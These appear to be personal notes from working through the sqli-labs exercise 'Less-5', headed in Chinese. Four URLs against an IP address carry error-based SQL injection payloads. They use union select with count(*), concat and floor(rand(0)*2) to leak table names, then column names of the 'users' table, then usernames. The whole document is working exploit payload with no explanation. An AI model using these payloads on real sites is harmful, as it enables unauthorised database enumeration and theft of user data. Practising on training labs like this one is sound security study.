1.报表名字
http://43.247.91.228:84/Less-5/?id=1%27%20union%20select%20count(*),concat(0x3a,0x3a,(select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%203,1),0x3a,floor(rand(0)*2))as%20a,3%20from%20information_schema.columns%20group%20by%20a%20--+
2.报字段名字
http://43.247.91.228:84/Less-5/?id=1%27%20union%20select%20count(*),concat(0x3a,0x3a,(select%20column_name%20from%20information_schema.columns%20where%20table_name=%27users%27%20limit%202,1),0x3a,floor(rand(0)*2))as%20a,3%20from%20information_schema.columns%20group%20by%20a%20--+
http://43.247.91.228:84/Less-5/?id=1%27%20union%20select%20count(*),concat(0x3a,0x3a,(select%20column_name%20from%20information_schema.columns%20where%20table_name=%27users%27%20limit%201,1),0x3a,floor(rand(0)*2))as%20a,3%20from%20information_schema.columns%20group%20by%20a%20--+
3.爆出字段
http://43.247.91.228:84/Less-5/?id=1%27%20union%20select%20count(*),concat(0x3a,0x3a,(select%20username%20from%20users%20limit%201,1),0x3a,floor(rand(0)*2))as%20a,3%20from%20information_schema.columns%20group%20by%20a%20--+